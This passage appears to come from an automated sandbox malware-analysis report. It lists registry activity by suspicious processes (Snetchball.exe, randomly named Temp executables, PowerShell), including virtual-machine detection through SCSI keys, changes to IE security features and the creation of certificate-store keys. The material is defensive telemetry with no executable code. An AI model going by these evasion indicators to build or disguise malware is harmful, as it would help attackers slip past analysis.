N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\FriendlyName C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Steam\steam.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Steam\steam.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\utorrentie.exe = "11000" C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION\utorrentie.exe = "1" C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CROSS_DOMAIN_REDIRECT_MITIGATION C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CROSS_DOMAIN_REDIRECT_MITIGATION\utorrentie.exe = "0" C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fc95478e-0000-0000-0000-d01200000000} C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fc95478e-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
